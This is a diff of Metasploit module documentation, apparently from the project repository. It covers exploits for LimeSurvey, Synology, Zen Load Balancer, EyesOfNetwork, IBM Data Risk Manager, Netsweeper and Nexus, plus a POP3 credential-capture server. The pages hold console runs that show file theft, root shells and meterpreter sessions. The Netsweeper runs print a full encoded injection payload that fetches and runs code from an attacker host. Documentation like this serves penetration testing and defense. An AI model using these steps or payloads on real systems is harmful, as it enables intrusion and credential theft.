+### LimeSurvey 4.1.11, 3.15.0, 3.9.0, 3.6.0, 3.0.0, and 2.70.0 on Ubuntu 18.04
+
+```
+[*] Processing lime41.rb for ERB directives.
+resource (lime41.rb)> use auxiliary/scanner/http/limesurvey_zip_traversals
+resource (lime41.rb)> set rhosts 2.2.2.2
+rhosts => 2.2.2.2
+resource (lime41.rb)> set verbose true
+verbose => true
+resource (lime41.rb)> set targeturi /LimeSurvey-4.1.11-200316/
+targeturi => /LimeSurvey-4.1.11-200316/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SzF-eUl4RW1lU0h-aFZxWmNwbGZOREJrYUduZzI1WTaGH7eqrOmgcse5liKfPNZ8qqKkvenm5Fu6oxTSyVWDrQ==
+[+] Login Successful
+[*] Version Detected: 4.1.11
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.15.0-181008/
+targeturi => /LimeSurvey-3.15.0-181008/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SDNyc21VYXJONmIwbjFkOENmUzEyS1NMX3lPQ0VYRTJyfE0iGABAxOsuZhxGdZd59W3dNCVx2D6JABRxmu6dgw==
+[+] Login Successful
+[*] Version Detected: 3.15.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.9.0-180604/
+targeturi => /LimeSurvey-3.9.0-180604/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => QldPa0lZM0o0cUV-STU4NWVoYVlDdHNtYmhmVVl6NW39a1wvfep0Ccsuz_gx9V1AnMjtADnprALM7qwvxUz3Wg==
+[+] Login Successful
+[*] Version Detected: 3.9.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.6.0-180328/
+targeturi => /LimeSurvey-3.6.0-180328/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => SHJzSk81ak5rdWdONTJWV0VLQTlHcjRKeGNIaFlYREqfcU-BuMlPRimIHJipKDsrCF3i7j29J4bNFwxsYGD42A==
+[+] Login Successful
+[*] Version Detected: 3.6.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-3.0.0-171222/
+targeturi => /LimeSurvey-3.0.0-171222/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => T1VkbDlhYU9IbkZHel9wd0JoVVl5RTUxQ2h2Mk9yN0-AXAtaTDCOMX8gWru7EmBHPBumgY0FG0vAFLwCwyeeuA==
+[+] Login Successful
+[*] Version Detected: 3.0.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> set targeturi /LimeSurvey-2.70.0-170921/
+targeturi => /LimeSurvey-2.70.0-170921/
+resource (lime41.rb)> run
+[*] CSRF: YII_CSRF_TOKEN => elhvTzJaWGlJWU10WnBFajlTYmN5a1VHY1M0bDNJd1C2okYXL__0in7KMlmwY6_Iuk8sI7H7s2zQPZ5NiWW_Xg==
+[+] Login Successful
+[*] Version Detected: 2.70.0
+[*] Attempting to retrieve file
+[+] File stored to: /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+resource (lime41.rb)> md5sum ~/.msf4/loot/*
+[*] exec: md5sum ~/.msf4/loot/*
+
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__530709.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__228237.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141208_default_2.2.2.2__407491.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__149900.txt
+3cf5f3492b7c77a77f74124bb4ccb528  /home/h00die/.msf4/loot/20200408141209_default_2.2.2.2__611969.txt
+msf5 auxiliary(scanner/http/limesurvey_zip_traversals) > cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+[*] exec: cat /home/h00die/.msf4/loot/20200408141207_default_2.2.2.2__164991.txt
+
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+...snip...
+mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
+```

documentation/modules/auxiliary/scanner/http/synology_forget_passwd_user_enum.md

@@ -0,0 +1,76 @@
+## Vulnerable Application
+
+This module attempts to enumerate users on the Synology NAS by sending GET requests
+for the forgot password URL. The Synology NAS will respond differently if a user is
+present or not. These count as login attempts, and the default is 10 logins in 5min to
+get a permanent block.  Set delay accordingly to avoid this, as default is permanent.
+
+Vulnerable DSMs are:
+ * DSM 6.1 < 6.1.3-15152
+ * DSM 6.0 < 6.0.3-8754-4
+ * DSM 5.2 < 5.2-5967-04
+
+Enumeration is case insensitive.
+
+To turn off Auto Block: Control Panel (Advanced Mode) > Security > Auto Block.
+
+To unblock: Control Panel (Advanced Mode) > Security > Auto Block > Allow/Block List > Block List.
+
+### Responses
+
+The server responds with a JSON object and a 'msg' key.  The values translate as:
+
+ * msg 1 - means user can login to GUI
+ * msg 2 - means user exists but no GUI login
+ * msg 3 - means feature disabled, or patched
+ * msg 4 - means no user
+ * msg 5 - means auto block is enabled and youre blocked. Default is 10 login attempts, and these
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: ```use auxiliary/scanner/http/synology_forget_passwd_user_enum```
+  4. Do: ```set rhosts [ip]```
+  5. Do: ```set delay [seconds]```
+  6. You should hopefully find some usernames
+
+## Options
+
+### Delay
+
+The delay in seconds between enumeration attempts.  Default lockout policy is 10 attempts in 5min,
+so this should avoid the lockout.  Default is `36`.
+
+### USER_LIST
+
+The username list to use, defaults to `data/wordlists/unix_users.txt`
+
+## Scenarios
+
+### DS412+ with DSM 5.2-5644 with auto block turned off
+
+  ```
+  [*] Processing syn_login.rb for ERB directives.
+  resource (syn_login.rb)> use auxiliary/scanner/http/synology_forget_passwd_user_enum
+  resource (syn_login.rb)> set rhosts 2.2.2.2
+  rhosts => 2.2.2.2
+  resource (syn_login.rb)> set delay 0
+  delay => 0
+  resource (syn_login.rb)> run
+  [+] admin - admin group
+  [+] avahi - no mail or no priviege
+  [+] ftp - no mail or no priviege
+  [+] guest - no mail or no priviege
+  [+] lp - no mail or no priviege
+  [+] mysql - no mail or no priviege
+  [+] nobody - no mail or no priviege
+  [+] ntp - no mail or no priviege
+  [+] postfix - no mail or no priviege
+  [+] postgres - no mail or no priviege
+  [+] root - no mail or no priviege
+  [+] ROOT - no mail or no priviege
+  [+] http://2.2.2.2:5000/ - Users found: ROOT, admin, avahi, ftp, guest, lp, mysql, nobody, ntp, postfix, postgres, root
+  [*] Scanned 1 of 1 hosts (100% complete)
+  [*] Auxiliary module execution completed
+  ```

documentation/modules/auxiliary/scanner/http/zenload_balancer_traversal.md

@@ -0,0 +1,34 @@
+## Description
+
+Zen load balancer before v3.10.1 is vulnerable to authenticated directory traversal. The flaw exists in 'index.cgi' not properly handling 'filelog=' parameter which allows a malicious actor to load arbitrary file path.
+
+## Vulnerable Application
+
+[Vulnerable ISO](https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download)
+
+## Verification Steps
+
+1. `./msfconsole -q`
+2. `set RHOSTS <rhost>`
+3. `set RPORT <rport>`
+4. `set FILEPATH <filepath>`
+5. `set ssl <true/false>`
+6. `set HttpPassword <admin>`
+7. `set HttpUsername <admin>`
+5. `run`
+
+## Scenarios
+
+```
+msf5 > use auxiliary/scanner/http/zenload_balancer_traversal 
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set RHOSTS 192.168.1.101
+RHOSTS => 192.168.1.101
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > set SSL true 
+SSL => true
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) > run
+[*] Running module against 192.168.1.101
+
+[+] File saved in: /Users/Dhiraj/.msf4/loot/20200412142620_default_192.168.1.101_zenload.http_196293.txt
+[*] Auxiliary module execution completed
+msf5 auxiliary(scanner/http/zenload_balancer_traversal) >
+```

documentation/modules/auxiliary/server/capture/pop3.md

@@ -0,0 +1,53 @@
+## Vulnerable Application
+
+This module creates a mock POP3 server which accepts credentials.
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Do: ```use auxiliary/server/capture/pop3```
+  3. Do: ```run```
+
+## Options
+
+## Scenarios
+
+### Testing Script
+
+The following script will attempt a login of the server.
+
+```
+require 'net/pop'
+
+puts 'Attempting Login'
+Net::POP3.start('127.0.0.1', 110, 'username', 'password') do |pop|
+  # check for email, should be none
+  if pop.mails.empty?
+    puts 'No mail'
+  end
+end
+```
+
+### Output from testing script
+
+When this script is run from the Metasploit console, it intermingles with the commands.
+
+```
+$ sudo ./msfconsole -qx 'use auxiliary/server/capture/pop3; set srvhost 127.0.0.1; run; ruby test_capture_pop3.rb;creds'
+srvhost => 127.0.0.1
+[*] Auxiliary module running as background job 0.
+[*] exec: ruby test_capture_pop3.rb
+
+[*] Started service listener on 127.0.0.1:110 
+[*] Server started.
+Attempting Login
+[+] POP3 LOGIN 127.0.0.1:35766 username / password
+No mail
+Credentials
+===========
+
+host       origin     service         public    private   realm  private_type  JtR Format
+----       ------     -------         ------    -------   -----  ------------  ----------
+127.0.0.1  127.0.0.1  110/tcp (pop3)  username  password         Password      
+
+```

documentation/modules/exploit/bsd/finger/morris_fingerd_bof.md

@@ -17,26 +17,24 @@ For manual setup, please follow the Computer History Wiki's
 Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
 you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).
 
-### Targets
-
-```
-Id  Name
---  ----
-0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
-```
-
 ## Verification Steps
 
 Follow [Setup](#setup) and [Scenarios](#scenarios).
 
+## Targets
+
+### 0
+
+This targets `fingerd` version 5.1 from 1985-06-06.
+
 ## Options
 
-**RPORT**
+### RPORT
 
 Set this to the target port. The default is 79 for `fingerd`, but the
 port may be forwarded when NAT (SLiRP) is used in SIMH.
 
-**PAYLOAD**
+### PAYLOAD
 
 Set this to a BSD VAX payload. Currently, only
 `bsd/vax/shell_reverse_tcp` is supported.
@@ -47,13 +45,14 @@ Set this to a BSD VAX payload. Currently, only
 
 ```
 msf5 > use exploit/bsd/finger/morris_fingerd_bof
-msf5 exploit(bsd/finger/morris_fingerd_bof) > show missing
+msf5 exploit(bsd/finger/morris_fingerd_bof) > options
 
 Module options (exploit/bsd/finger/morris_fingerd_bof):
 
    Name    Current Setting  Required  Description
    ----    ---------------  --------  -----------
    RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT   79               yes       The target port (TCP)
 
 
 Payload options (bsd/vax/shell_reverse_tcp):
@@ -61,6 +60,15 @@ Payload options (bsd/vax/shell_reverse_tcp):
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
    LHOST                   yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   @(#)fingerd.c   5.1 (Berkeley) 6/6/85
+
 
 msf5 exploit(bsd/finger/morris_fingerd_bof) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1

documentation/modules/exploit/linux/http/eyesofnetwork_autodiscovery_rce.md

@@ -1,11 +1,23 @@
 ## Vulnerable Application
-This module exploits multiple vulnerabilities in EyesOfNetwork version 5.3 and prior in order to execute arbitrary commands as root.
+This module exploits multiple vulnerabilities in EyesOfNetwork version 5.1, 5.2 and 5.3 in order to execute arbitrary
+commands as root.
 
-The module first exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to generate a valid access token and use it to create a new user with admin privileges. If the generated key is not valid, the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656).
+The module first runs a few checks to verify the EyesOfNetwork version. If version 5.1 or 5.2 is detected, it attempts
+an authentication bypass via an SQL injection in the `user_id` field in a cookie (CVE-2020-9465). If version 5.3 is
+detected, the module exploits a hardcoded admin API key in EyesOfNetwork API version 2.4.2 (CVE-2020-8657) in order to
+generate a valid access token and uses it to create a new user with admin privileges. If the generated key is not valid,
+the admin API key is obtained via an SQL injection vulnerability affecting the same API version (CVE-2020-8656). If this
+doesn't work either, it attempts CVE-2020-9465, which is the slowest and most noisy exploit of the three.
 
-Next, the module authenticates as the newly created user in order to abuse a command injection vulnerability in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically, it writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap host discovery scan against the target. This approach achieves privilege escalation because the default sudo configuration permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
+For all vulnerable versions, the next step after bypassing authentication is to abuse a command injection vulnerability
+in the `target` parameter of the AutoDiscovery functionality within the EON web interface (CVE-2020-8654). Specifically,
+the module writes an Nmap NSE script containing the payload to disk, and then activates this script by launching an Nmap
+host discovery scan against the target. This achieves privilege escalation because the default sudo configuration
+permits the 'apache' user to execute Nmap as root (CVE-2020-8655).
 
-The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative privileges are required. However, this module can bypass authentication via two methods, i.e. by generating an API access token based on a hardcoded key, and via SQLI. This module has been successfully tested on EyesOfNetwork 5.3 with API version 2.4.2.
+The module only works with HTTPS, so SSL is enabled by default. Valid credentials for a user with administrative
+privileges are required. However, as explained above, the module can bypass authentication via various methods,
+depending on the EON version. This module has been successfully tested on EyesOfNetwork 5.1, 5.2 and 5.3.
 
 ## Verification Steps
 1. Install the module as usual
@@ -17,9 +29,18 @@ The module only works with HTTPS, so SSL is enabled by default. Valid credential
 7. Do: `exploit`
 
 ## Options
-1. `SERVER_ADDR`. This option should be set in case the EyesOfNetwork server IP address is different from RHOST. This because the EON server IP is needed to generate the API key.
+
+### SERVER_ADDR
+This option should be set for EON version 5.3 in case the EyesOfNetwork server IP address is different from `RHOST`.
+This because the EON server IP is needed to generate the API key.
+
+### SQLI_SLEEP
+The sleep value to be used when attempting to exploit CVE-2020-9465, which uses sleep-based SQL injection. The default
+value is 1.
 
 ## Scenarios
+1. EyesOfNetwork version 5.1
+
 ```
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > show options
 
@@ -31,12 +52,16 @@ Module options (exploit/linux/http/eyesofnetwork_autodiscovery_rce):
    RHOSTS       192.168.1.1      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT        443              yes       The target port (TCP)
    SERVER_ADDR                   yes       EyesOfNetwork server IP address (if different from RHOST)
+   SRVHOST      0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
+   SRVPORT      8080             yes       The local port to listen on.
    SSL          true             no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
    TARGETURI    /                yes       Base path to EyesOfNetwork
+   URIPATH                       no        The URI to use for this exploit (default is random)
    VHOST                         no        HTTP server virtual host
 
 
-Payload options (generic/shell_reverse_tcp):
+Payload options (linux/x64/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
@@ -48,23 +73,58 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Auto
+   1   Linux (x64)
 
 
 msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.2:4444 
-[*] Using generated API key: a496fb1025187066dc1e4e56197bd2db1a23c565f42b98df8ff55698442b6476
-[+] Authenticated as user kY7Qn1gr8L
-[*] Sending payload (428 bytes) ...
-[*] Command shell session 1 opened (192.168.1.2:4444 -> 192.168.1.1:45897) at 2020-02-19 15:30:31 +0100
-
-id
-uid=0(root) gid=0(root) groups=0(root)
+[*] Target is EyesOfNetwork version 5.1. Attempting exploitation using CVE-2020-9465.
+[+] The target seems vulnerable.
+[*] Verified that the admin user has at least one active session.
+[*] Found the admin 'session_id' size: 31
+[*] Calculating the admin 'session_id' value. This will take a while...
+[+] Obtained admin 'session_id' value: 1856115646
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.1
+[*] Meterpreter session 1 opened (192.168.91.2:4444 -> 192.168.1.1:55744) at 2020-05-19 08:48:37 -0400
 ```
+
+2. EyesOfNetwork version 5.2
+
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Target is EyesOfNetwork version 5.2. Attempting exploitation using CVE-2020-9465.
+[+] The target seems vulnerable.
+[*] Verified that the admin user has at least one active session.
+[*] Found the admin 'session_id' size: 31
+[*] Calculating the admin 'session_id' value. This will take a while...
+[+] Obtained admin 'session_id' value: 1445224287
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.3
+[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
+```
+
+3. EyesOfNetwork version 5.3
+
+```
+msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.2:4444 
+[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.
+[*] Using generated API key: a926605f4e617fd68bbb86112156b41ea2406503859dad58b0d0aefcc848b755
+[+] Authenticated as user r6veXwtZ2zh
+[*] Command Stager progress - 100.00% done (897/897 bytes)
+[*] Sending stage (3012516 bytes) to 192.168.1.4
+[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400
+```
+
 ## References
 1. <https://www.exploit-db.com/exploits/48025>
 2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
 3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
 4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
 5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>
+6. <https://nvd.nist.gov/vuln/detail/CVE-2020-9465>

documentation/modules/exploit/linux/http/ibm_drm_rce.md

@@ -0,0 +1,47 @@
+## Vulnerable Application
+
+IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by an unauthenticated attacker to achieve remote code execution as root.
+The first is an unauthenticated bypass, followed by a command injection as the server user, and finally abuse of an insecure default password.
+This module exploits all three vulnerabilities, giving the attacker a root shell.
+At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
+
+
+### Vulnerability information
+For more information about the vulnerability check the advisory at:
+https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
+
+### Setup
+
+The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
+
+## Verification Steps
+
+Module defaults work very well, you should just need to set `RHOSTS` and `LHOST`.
+
+## Scenarios
+
+
+## Scenarios
+
+A successful exploit will look like this:
+
+
+```
+msf5 exploit(linux/http/ibm_drm_unauth_rce) > run
+
+[*] Started reverse TCP handler on 10.9.8.1:4444
+[+] 10.9.8.213:8443 - Successfully "stickied" our session ID JQElTQxh
+[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
+[+] 10.9.8.213:8443 - ... and are authenticated as an admin!
+[*] 10.9.8.213:8443 - Detected IBM Data Risk Manager version 2.0.2 or above
+[+] 10.9.8.213:8443 - We have uploaded our payload...
+[+] 10.9.8.213:8443 - and our nmap script file!
+[+] 10.9.8.213:8443 - Bearer token 1b78100c-cf42-47fd-b64d-d36c07f1f934 obtained, wait for the final step where we invoke nmap...
+[+] 10.9.8.213:8443 - Shell incoming!
+[*] Command shell session 2 opened (10.9.8.1:4444 -> 10.9.8.213:57136) at 2020-04-21 15:46:29 +0700
+
+whoami
+root
+uname -a
+Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
+```

documentation/modules/exploit/linux/http/netsweeper_webadmin_unixlogin.md

@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Python code injection in the Netsweeper
+WebAdmin component's `unixlogin.php` script, for versions 6.4.4 and
+prior, to execute code as the root user.
+
+Authentication is bypassed by sending a random whitelisted `Referer`
+header in each request.
+
+Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
+Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
+been confirmed exploitable.
+
+### Setup
+
+1. Download the [Netsweeper 6.4.3
+   ISO](https://repo.netsweeper.com/netsweeper-el6-x86_64-6.4.3-1.iso)
+2. Boot from the ISO as a DVD in your preferred virtualization software
+3. Install the system as per the guided prompts
+
+The system is based on CentOS Linux 6, and you may consult CentOS 6
+documentation for guidance on the installation process.
+
+The default credentials for WebAdmin are `admin:netsweeper` if you need
+to log in to the web interface. This is not required for exploitation.
+
+## Verification Steps
+
+Follow [Setup](#setup) and [Scenarios](#scenarios).
+
+## Targets
+
+### 0
+
+This executes a Python payload.
+
+## Scenarios
+
+### Netsweeper 6.4.3 ISO, based on CentOS Linux
+
+```
+msf5 > use exploit/linux/http/netsweeper_webadmin_unixlogin
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > options
+
+Module options (exploit/linux/http/netsweeper_webadmin_unixlogin):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
+   RPORT      443              yes       The target port (TCP)
+   SSL        true             no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       Base path
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (python/meterpreter/reverse_https):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST                   yes       The local listener hostname
+   LPORT  8443             yes       The local listener port
+   LURI                    no        The HTTP Path
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Python
+
+
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157
+rhosts => 172.16.249.157
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1
+lhost => 172.16.249.1
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run
+
+[*] Started HTTPS reverse handler on https://172.16.249.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Netsweeper 6.4.3 is a vulnerable version.
+[*] Selecting random whitelisted Referer header: webadmin/api/
+[*] Injecting Python code into password field: 0IonGkMXLHAz6WEurtI51ymUIkdaTIbP48wmlbCg7', 'd6'); exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMTYuMjQ5LjE6ODQ0My9YSDc1NmxXSnBQbjlUT2hZb19iT01BSldYQmRROScpLnJlYWQoKSkK')[0])) #
+[*] Sending python/meterpreter/reverse_https to https://172.16.249.157/webadmin/tools/unixlogin.php
+[*] https://172.16.249.1:8443 handling request from 172.16.249.157; (UUID: xvp5ei8z) Staging python payload (53935 bytes) ...
+[*] Meterpreter session 1 opened (172.16.249.1:8443 -> 172.16.249.157:54130) at 2020-05-12 00:26:22 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : localhost.localdomain
+OS              : Linux 2.6.32-754.25.1.el6.x86_64 #1 SMP Mon Dec 23 15:19:53 UTC 2019
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```
+
+### Netsweeper 6.4.4 ISO, based on CentOS Linux
+
+```
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160
+rhosts => 172.16.249.160
+msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run
+
+[*] Started HTTPS reverse handler on https://172.16.249.1:8443
+[*] Executing automatic check (disable AutoCheck to override)
+[+] The target appears to be vulnerable. Netsweeper 6.4.4 is a vulnerable version.
+[*] Selecting random whitelisted Referer header: webadmin/systemconfig/edit_email_sending_settings.php
+[*] Injecting Python code into password field: 7Ot5EJTCtZeprAkH36J9t2Equy8', 'oL'); exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMTYuMjQ5LjE6ODQ0My9KMFVhZjBVVzFic2lWemREZk8wUjdnVTZCUVBRYycpLnJlYWQoKSkK')[0])) #
+[*] Sending python/meterpreter/reverse_https to https://172.16.249.160/webadmin/tools/unixlogin.php
+[*] https://172.16.249.1:8443 handling request from 172.16.249.160; (UUID: bh9jykhb) Staging python payload (53873 bytes) ...
+[*] Meterpreter session 2 opened (172.16.249.1:8443 -> 172.16.249.160:49172) at 2020-05-12 00:27:22 -0500
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer        : localhost.localdomain
+OS              : Linux 2.6.32-754.25.1.el6.x86_64 #1 SMP Mon Dec 23 15:19:53 UTC 2019
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter >
+```

documentation/modules/exploit/linux/http/nexus_repo_manager_el_injection.md

@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits a Java Expression Language (EL) injection in
+Nexus Repository Manager versions up to and including 3.21.1 to
+execute code as the Nexus user.
+
+This is a post-authentication vulnerability, so credentials are
+required to exploit the bug. Any user regardless of privilege level
+may be used.
+
+Tested against 3.21.1-01.
+
+### Setup
+
+Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
+Follow the instructions for your platform and distribution (if using
+Linux). If you're using OS X, you may prefer to `brew cask install docker`
+after installing [Homebrew](https://brew.sh/).
+
+#### Starting the application
+
+Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
+(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
